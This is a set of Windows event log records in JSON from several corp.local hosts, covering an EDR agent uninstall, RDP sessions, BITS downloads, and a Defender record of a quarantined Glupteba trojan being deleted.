{"EventTime":"2021-09-29T13:34:29.746942+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1034,"SourceName":"MsiInstaller","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":69839,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"Windows Installer removed the product. Product Name: EDR Agent v2. Product Version: 2.0.0.0. Product Language: 1033. Manufacturer: OpenEdr. Removal success or error status: 0.","Opcode":"Info","Data":"EDR Agent v2","Data_1":"2.0.0.0","Data_2":"1033","Data_3":"0","Data_4":"OpenEdr","Data_5":"(NULL)","EventData.Binary":"7B34354343353536432D413033422D343246462D413246452D3030303030303030303030307D3030303039323065343765663532383433393263373132393635616534306161626430633030303030393034","EventReceivedTime":"2021-09-29T13:34:52.764301+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T13:34:29.746942+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11724,"SourceName":"MsiInstaller","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":69838,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"Product: EDR Agent v2 -- Removal completed successfully.","Opcode":"Info","Data":"Product: EDR Agent v2 -- Removal completed successfully.","Data_1":"(NULL)","Data_2":"(NULL)","Data_3":"(NULL)","Data_4":"(NULL)","Data_5":"(NULL)","EventData.Binary":"7B34354343353536432D413033422D343246462D413246452D3030303030303030303030307D","EventReceivedTime":"2021-09-29T13:34:52.758745+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T14:19:43.614355+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":6000,"SourceName":"Microsoft-Windows-Winlogon","ProviderGuid":"{DBE9B383-7CF3-4331-91CC-A3CB16A3B538}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":69847,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"The winlogon notification subscriber <WSearch> was unavailable to handle a notification event.","Data":"WSearch","EventData.Binary":"D9060000","EventReceivedTime":"2021-09-29T14:19:44.480845+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T14:19:43.618807+05:45","Hostname":"IT02.corp.local","Keywords":"1152921504606846976","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":23,"SourceName":"Microsoft-Windows-TerminalServices-LocalSessionManager","ProviderGuid":"{5D896912-022D-40AA-A3A8-4FA5515C76D7}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":3975,"ActivityID":"{F420310A-949A-4CA3-9D0B-B777C69E0000}","ExecutionProcessID":1020,"ExecutionThreadID":6768,"Channel":"Microsoft-Windows-TerminalServices-LocalSessionManager/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Remote Desktop Services: Session logoff succeeded:\r\n\r\nUser: CORP\\Leo\r\nSession ID: 7","Opcode":"Info","EventXML.User":"CORP\\Leo","EventXML.SessionID":"7","EventReceivedTime":"2021-09-29T14:19:44.598869+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T14:19:44.338717+05:45","Hostname":"IT02.corp.local","Keywords":"2305878193585782784","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7002,"SourceName":"Microsoft-Windows-Winlogon","ProviderGuid":"{DBE9B383-7CF3-4331-91CC-A3CB16A3B538}","Version":0,"TaskValue":1102,"OpcodeValue":0,"RecordNumber":82738,"ExecutionProcessID":8384,"ExecutionThreadID":4268,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"User Logoff Notification for Customer Experience Improvement Program","Opcode":"Info","TSId":"7","UserSid":"S-1-5-21-2569713578-3403938347-3732993993-1139","EventReceivedTime":"2021-09-29T14:19:45.678518+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T14:19:45.729455+05:45","Hostname":"IT02.corp.local","Keywords":"1152921504606846976","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":24,"SourceName":"Microsoft-Windows-TerminalServices-LocalSessionManager","ProviderGuid":"{5D896912-022D-40AA-A3A8-4FA5515C76D7}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":3977,"ActivityID":"{F420310A-949A-4CA3-9D0B-B777C69E0000}","ExecutionProcessID":1020,"ExecutionThreadID":9480,"Channel":"Microsoft-Windows-TerminalServices-LocalSessionManager/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Remote Desktop Services: Session has been disconnected:\r\n\r\nUser: CORP\\Leo\r\nSession ID: 7\r\nSource Network Address: 172.16.20.11","Opcode":"Info","EventXML.User":"CORP\\Leo","EventXML.SessionID":"7","EventXML.Address":"172.16.20.11","EventReceivedTime":"2021-09-29T14:19:46.787389+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T19:39:52.374326+05:45","Hostname":"IT03.corp.local","Keywords":"2305843009213759488","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":28032,"SourceName":"Microsoft-Windows-Shell-Core","ProviderGuid":"{30336ED4-E327-447C-9DE0-51B652C86108}","Version":0,"TaskValue":28180,"OpcodeValue":0,"RecordNumber":7591,"ExecutionProcessID":4488,"ExecutionThreadID":6272,"Channel":"Microsoft-Windows-Shell-Core/Operational","Domain":"IT03","AccountName":"Administrator","UserID":"S-1-5-21-3281079745-558096271-899791025-500","AccountType":"User","Message":"AppResolver has parsed the visual elements manifest for a tile.","Opcode":"Info","Filename":"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.VisualElementsManifest.xml","SchemaType":"2","ErrorCode":"0","Failure reason":"NULL","EventReceivedTime":"2021-09-29T19:39:54.330464+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T19:39:52.439542+05:45","Hostname":"IT03.corp.local","Keywords":"2305843009213759488","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":28018,"SourceName":"Microsoft-Windows-Shell-Core","ProviderGuid":"{30336ED4-E327-447C-9DE0-51B652C86108}","Version":0,"TaskValue":28177,"OpcodeValue":2,"RecordNumber":7593,"ExecutionProcessID":4488,"ExecutionThreadID":6272,"Channel":"Microsoft-Windows-Shell-Core/Operational","Domain":"IT03","AccountName":"Administrator","UserID":"S-1-5-21-3281079745-558096271-899791025-500","AccountType":"User","Message":"AppResolver Scan Stopped.","Opcode":"Stop","EventData":"","EventReceivedTime":"2021-09-29T19:39:54.330464+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T19:39:52.381765+05:45","Hostname":"IT03.corp.local","Keywords":"2305843009213759488","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":28117,"SourceName":"Microsoft-Windows-Shell-Core","ProviderGuid":"{30336ED4-E327-447C-9DE0-51B652C86108}","Version":0,"TaskValue":28143,"OpcodeValue":0,"RecordNumber":7592,"ExecutionProcessID":4488,"ExecutionThreadID":6272,"Channel":"Microsoft-Windows-Shell-Core/Operational","Domain":"IT03","AccountName":"Administrator","UserID":"S-1-5-21-3281079745-558096271-899791025-500","AccountType":"User","Message":"Shortcut for application Google Chrome with ID Chrome and flags 0x31 is updated in app resolver cache.","Opcode":"Info","Name":"Google Chrome","AppID":"Chrome","Flags":"49","EventReceivedTime":"2021-09-29T19:39:54.330464+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T19:39:52.445153+05:45","Hostname":"IT03.corp.local","Keywords":"2305843009213759488","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":28019,"SourceName":"Microsoft-Windows-Shell-Core","ProviderGuid":"{30336ED4-E327-447C-9DE0-51B652C86108}","Version":0,"TaskValue":28179,"OpcodeValue":0,"RecordNumber":7594,"ExecutionProcessID":4488,"ExecutionThreadID":6272,"Channel":"Microsoft-Windows-Shell-Core/Operational","Domain":"IT03","AccountName":"Administrator","UserID":"S-1-5-21-3281079745-558096271-899791025-500","AccountType":"User","Message":"AppResolver Cache Committed.","Opcode":"Info","EventData":"","EventReceivedTime":"2021-09-29T19:39:54.330464+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T19:39:52.349673+05:45","Hostname":"IT03.corp.local","Keywords":"2305843009213759488","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":28017,"SourceName":"Microsoft-Windows-Shell-Core","ProviderGuid":"{30336ED4-E327-447C-9DE0-51B652C86108}","Version":0,"TaskValue":28177,"OpcodeValue":1,"RecordNumber":7590,"ExecutionProcessID":4488,"ExecutionThreadID":6272,"Channel":"Microsoft-Windows-Shell-Core/Operational","Domain":"IT03","AccountName":"Administrator","UserID":"S-1-5-21-3281079745-558096271-899791025-500","AccountType":"User","Message":"AppResolver Scan Started.","Opcode":"Start","EventData":"","EventReceivedTime":"2021-09-29T19:39:54.330464+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T19:56:39.002949+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":16403,"SourceName":"Microsoft-Windows-Bits-Client","ProviderGuid":"{EF1CC15B-46C1-414E-BB95-E76B077BD51E}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":4543,"ExecutionProcessID":356,"ExecutionThreadID":2184,"Channel":"Microsoft-Windows-Bits-Client/Operational","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Opcode":"Info","User":"NT AUTHORITY\\LOCAL SERVICE","jobTitle":"Font Download","jobId":"{9e6fe86d-ae14-40b9-b53f-2ea6270dd430}","jobOwner":"NT AUTHORITY\\LOCAL SERVICE","fileCount":"1","RemoteName":"https://fs.microsoft.com/fs/windows/config.json","LocalName":"\\\\?\\C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\Fonts\\Download-2.tmp","processId":"1096","ClientProcessStartKey":"5066549580791831","EventReceivedTime":"2021-09-29T19:56:40.667603+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T19:56:38.973152+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Bits-Client","ProviderGuid":"{EF1CC15B-46C1-414E-BB95-E76B077BD51E}","Version":3,"TaskValue":0,"OpcodeValue":0,"RecordNumber":4541,"ExecutionProcessID":356,"ExecutionThreadID":2184,"Channel":"Microsoft-Windows-Bits-Client/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The BITS service created a new job.\r\nTransfer job: Font Download\r\nJob ID: {9e6fe86d-ae14-40b9-b53f-2ea6270dd430}\r\nOwner: NT AUTHORITY\\LOCAL SERVICE\r\nProcess Path: C:\\Windows\\System32\\svchost.exe\r\nProcess ID: 1096","Opcode":"Info","jobTitle":"Font Download","jobId":"{9e6fe86d-ae14-40b9-b53f-2ea6270dd430}","jobOwner":"NT AUTHORITY\\LOCAL SERVICE","processPath":"C:\\Windows\\System32\\svchost.exe","processId":"1096","ClientProcessStartKey":"5066549580791831","EventReceivedTime":"2021-09-29T19:56:40.667603+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T19:56:38.986045+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":209,"SourceName":"Microsoft-Windows-Bits-Client","ProviderGuid":"{EF1CC15B-46C1-414E-BB95-E76B077BD51E}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":4542,"ExecutionProcessID":356,"ExecutionThreadID":2184,"Channel":"Microsoft-Windows-Bits-Client/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"High performance property for BITS job \"Font Download\" with ID \"{9e6fe86d-ae14-40b9-b53f-2ea6270dd430}\" Enabled.","Opcode":"Info","jobName":"Font Download","jobId":"{9e6fe86d-ae14-40b9-b53f-2ea6270dd430}","isRoaming":"1","EventReceivedTime":"2021-09-29T19:56:40.667603+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T19:56:40.082598+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":4,"SourceName":"Microsoft-Windows-Bits-Client","ProviderGuid":"{EF1CC15B-46C1-414E-BB95-E76B077BD51E}","Version":1,"TaskValue":0,"OpcodeValue":0,"RecordNumber":4549,"ExecutionProcessID":356,"ExecutionThreadID":6204,"Channel":"Microsoft-Windows-Bits-Client/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The transfer job is complete.\r\nUser: NT AUTHORITY\\LOCAL SERVICE\r\nTransfer job: Font Download\r\nJob ID: {9e6fe86d-ae14-40b9-b53f-2ea6270dd430}\r\nOwner: NT AUTHORITY\\LOCAL SERVICE\r\nFile count: 1","Opcode":"Info","User":"NT AUTHORITY\\LOCAL SERVICE","jobTitle":"Font Download","jobId":"{9e6fe86d-ae14-40b9-b53f-2ea6270dd430}","jobOwner":"NT AUTHORITY\\LOCAL SERVICE","fileCount":"1","bytesTransferred":"55","bytesTransferredFromPeer":"0","EventReceivedTime":"2021-09-29T19:56:41.693707+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T19:56:40.079033+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":60,"SourceName":"Microsoft-Windows-Bits-Client","ProviderGuid":"{EF1CC15B-46C1-414E-BB95-E76B077BD51E}","Version":1,"TaskValue":0,"OpcodeValue":2,"RecordNumber":4548,"ActivityID":"{287A2D3F-ED28-4936-8AED-CB90825D7094}","ExecutionProcessID":356,"ExecutionThreadID":6204,"Channel":"Microsoft-Windows-Bits-Client/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"BITS stopped transferring the Font Download transfer job that is associated with the https://fs.microsoft.com/fs/windows/config.json URL. The status code is 0x0.","Opcode":"Stop","transferId":"{287a2d3f-ed28-4936-8aed-cb90825d7094}","name":"Font Download","Id":"{9e6fe86d-ae14-40b9-b53f-2ea6270dd430}","url":"https://fs.microsoft.com/fs/windows/config.json","hr":"0","fileTime":"2017-04-20T16:11:08.000000000Z","fileLength":"55","bytesTotal":"55","bytesTransferred":"55","peerProtocolFlags":"0","bytesTransferredFromPeer":"0","AdditionalInfoHr":"0","PeerContextInfo":"0","bandwidthLimit":"18446744073709551615","ignoreBandwidthLimitsOnLan":"false","EventReceivedTime":"2021-09-29T19:56:41.678140+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T19:56:39.764775+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":310,"SourceName":"Microsoft-Windows-Bits-Client","ProviderGuid":"{EF1CC15B-46C1-414E-BB95-E76B077BD51E}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":4544,"ExecutionProcessID":356,"ExecutionThreadID":6556,"Channel":"Microsoft-Windows-Bits-Client/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The initialization of the peer helper modules failed with the following error: 0x80070032.","Opcode":"Info","ErrorCode":"2147942450","EventReceivedTime":"2021-09-29T19:56:41.678140+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T19:56:39.798725+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":59,"SourceName":"Microsoft-Windows-Bits-Client","ProviderGuid":"{EF1CC15B-46C1-414E-BB95-E76B077BD51E}","Version":1,"TaskValue":0,"OpcodeValue":1,"RecordNumber":4545,"ActivityID":"{0ACF5730-9A3E-44CA-92E1-D98D4F91E0B0}","ExecutionProcessID":356,"ExecutionThreadID":6556,"Channel":"Microsoft-Windows-Bits-Client/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"BITS started the Font Download transfer job that is associated with the https://fs.microsoft.com/fs/windows/config.json URL.","Opcode":"Start","transferId":"{0acf5730-9a3e-44ca-92e1-d98d4f91e0b0}","name":"Font Download","Id":"{9e6fe86d-ae14-40b9-b53f-2ea6270dd430}","url":"https://fs.microsoft.com/fs/windows/config.json","fileTime":"2017-04-20T16:10:39.000000000Z","fileLength":"55","bytesTotal":"55","bytesTransferred":"0","bytesTransferredFromPeer":"0","EventReceivedTime":"2021-09-29T19:56:41.678140+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-28T12:39:46.082041+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1011,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":22597,"ExecutionProcessID":2080,"ExecutionThreadID":6768,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Microsoft Defender Antivirus has deleted an item from quarantine.\r\n For more information please see the following:\r\nhttps://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Glupteba!ml&threatid=2147748182&enterprise=0\r\n \tName: Trojan:Win32/Glupteba!ml\r\n \tID: 2147748182\r\n \tSeverity: Severe\r\n \tCategory: Trojan\r\n \tUser: NT AUTHORITY\\SYSTEM\r\n \tSecurity intelligence Version: AV: 1.349.1543.0, AS: 1.349.1543.0\r\n \tEngine Version: 1.1.18500.10","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Product Version":"4.18.2108.7","User":"SYSTEM","SID":"S-1-5-18","Threat Name":"Trojan:Win32/Glupteba!ml","Threat ID":"2147748182","Severity ID":"5","Category ID":"8","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Glupteba!ml&threatid=2147748182&enterprise=0","Path":"file:_C:\\Windows\\b6a1458f396.exe","Severity Name":"Severe","Category Name":"Trojan","Security intelligence Version":"AV: 1.349.1543.0, AS: 1.349.1543.0","Engine Version":"1.1.18500.10","EventReceivedTime":"2021-09-28T12:39:48.364135+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T04:56:09.733600+05:45","Hostname":"IT03.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":5058,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":1,"TaskValue":12292,"OpcodeValue":0,"RecordNumber":40726202,"ExecutionProcessID":632,"ExecutionThreadID":3968,"Channel":"Security","Message":"Key file operation.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT03$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t4680\r\n\tProcess Creation Time:\t???2021???-???09???-???28T23:11:05.970699700Z\r\n\r\nCryptographic Parameters:\r\n\tProvider Name:\tMicrosoft Software Key Storage Provider\r\n\tAlgorithm Name:\tUNKNOWN\r\n\tKey Name:\t77640e54-d204-59d7-5059-5212bd67638e\r\n\tKey Type:\tUser key.\r\n\r\nKey File Operation Information:\r\n\tFile Path:\tC:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\7227327156fd8daa02999ffff5255449_0e823fd5-892f-4ff6-826b-8eb2e5230ee2\r\n\tOperation:\tRead persisted key from file.\r\n\tReturn Code:\t0x0","Category":"Other System Events","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT03$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","ClientProcessId":"4680","ClientCreationTime":"2021-09-28T23:11:05.970699700Z","ProviderName":"Microsoft Software Key Storage Provider","AlgorithmName":"UNKNOWN","KeyName":"77640e54-d204-59d7-5059-5212bd67638e","KeyType":"%%2500","KeyFilePath":"C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\7227327156fd8daa02999ffff5255449_0e823fd5-892f-4ff6-826b-8eb2e5230ee2","Operation":"%%2458","ReturnCode":"0x0","EventReceivedTime":"2021-09-29T04:56:11.120786+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T04:56:09.734313+05:45","Hostname":"IT03.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":5061,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12290,"OpcodeValue":0,"RecordNumber":40726203,"ExecutionProcessID":632,"ExecutionThreadID":3968,"Channel":"Security","Message":"Cryptographic operation.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT03$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nCryptographic Parameters:\r\n\tProvider Name:\tMicrosoft Software Key Storage Provider\r\n\tAlgorithm Name:\tRSA\r\n\tKey Name:\t77640e54-d204-59d7-5059-5212bd67638e\r\n\tKey Type:\tUser key.\r\n\r\nCryptographic Operation:\r\n\tOperation:\tOpen Key.\r\n\tReturn Code:\t0x0","Category":"System Integrity","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT03$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","ProviderName":"Microsoft Software Key Storage Provider","AlgorithmName":"RSA","KeyName":"77640e54-d204-59d7-5059-5212bd67638e","KeyType":"%%2500","Operation":"%%2480","ReturnCode":"0x0","EventReceivedTime":"2021-09-29T04:56:11.120786+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-28T00:17:16.165045+05:45","Hostname":"IT01.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1056,"SourceName":"Microsoft-Windows-TerminalServices-RemoteConnectionManager","ProviderGuid":"{C76BAA63-AE81-421C-B425-340B4B24157F}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":26000,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"A new self signed certificate to be used for RD Session Host Server authentication on SSL connections was generated. The name on this certificate is IT01.corp.local. The SHA1 hash of the certificate is in the event data.","Data":"IT01.corp.local","EventData.Binary":"ED0DB314DA35E6A0A82B0A865DF89748FB6FEF70","EventReceivedTime":"2021-09-28T00:17:16.654653+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-28T00:17:16.258437+05:45","Hostname":"IT01.corp.local","Keywords":"1152921504606846976","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":263,"SourceName":"Microsoft-Windows-TerminalServices-RemoteConnectionManager","ProviderGuid":"{C76BAA63-AE81-421C-B425-340B4B24157F}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":763,"ActivityID":"{F462FD51-0736-4F16-93A4-C0F9BFE30000}","ExecutionProcessID":1016,"ExecutionThreadID":4152,"Channel":"Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"WDDM graphics mode is enabled","Opcode":"Info","EventReceivedTime":"2021-09-28T00:17:17.663858+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-25T08:09:33.743396+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"4611686018695823360","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":1014,"SourceName":"Microsoft-Windows-DNS-Client","ProviderGuid":"{1C95126E-7EEA-49A9-A3FE-A378B03DDB4D}","Version":0,"TaskValue":1014,"OpcodeValue":0,"RecordNumber":56369,"ExecutionProcessID":1348,"ExecutionThreadID":1844,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"Name resolution for the name wpad timed out after none of the configured DNS servers responded.","Opcode":"Info","QueryName":"wpad","AddressLength":"128","Address":"02000000C0A804CB000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000","EventReceivedTime":"2021-09-25T08:09:34.773388+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-25T02:32:56.000000+05:45","Hostname":"DC01.corp.local","Keywords":"36028797018963968","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":6038,"SourceName":"LsaSrv","ProviderGuid":"{199FE037-2B82-40A9-82AC-E1D46C792B99}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":647449,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"Microsoft Windows Server has detected that NTLM authentication is presently being used between clients and this server. This event occurs once per boot of the server on the first time a client uses NTLM with this server.\r\n \r\nNTLM is a weaker authentication mechanism. Please check:\r\n \r\n Which applications are using NTLM authentication?\r\n Are there configuration issues preventing the use of stronger authentication such as Kerberos authentication?\r\n If NTLM must be supported, is Extended Protection configured?\r\n \r\nDetails on how to complete these checks can be found at http://go.microsoft.com/fwlink/?LinkId=225699.","Opcode":"Info","EventData":"","EventReceivedTime":"2021-09-25T02:32:57.033934+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T09:41:19.484925+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9223372036854775808","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":50,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":56285,"ExecutionProcessID":1212,"ExecutionThreadID":1356,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"The time service detected a time difference of greater than 5000 milliseconds for 900 seconds. The time difference might be caused by synchronization with low-accuracy time sources or by suboptimal network conditions. The time service is no longer synchronized and cannot provide the time to other clients or update the system clock. When a valid time stamp is received from a time service provider, the time service will correct itself.","Opcode":"Info","EventData.Name":"TMP_EVENT_LOCALCLOCK_UNSET","TimeDifferenceMilliseconds":"5000","TimeSampleSeconds":"900","EventReceivedTime":"2021-09-23T09:41:20.640680+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T12:24:40.381081+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":9027,"SourceName":"Desktop Window Manager","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":69268,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"The Desktop Window Manager has registered the session port.","EventReceivedTime":"2021-09-23T12:24:41.036926+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T12:24:41.128712+05:45","Hostname":"IT02.corp.local","Keywords":"1152921504606846976","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":41,"SourceName":"Microsoft-Windows-TerminalServices-LocalSessionManager","ProviderGuid":"{5D896912-022D-40AA-A3A8-4FA5515C76D7}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":3967,"ActivityID":"{F420916B-D21E-4094-9937-ED9A4AA50000}","ExecutionProcessID":1020,"ExecutionThreadID":8896,"Channel":"Microsoft-Windows-TerminalServices-LocalSessionManager/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Begin session arbitration:\r\n\r\nUser: CORP\\Leo\r\nSession ID: 7","Opcode":"Info","EventXML.User":"CORP\\Leo","EventXML.SessionID":"7","EventReceivedTime":"2021-09-23T12:24:42.068561+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
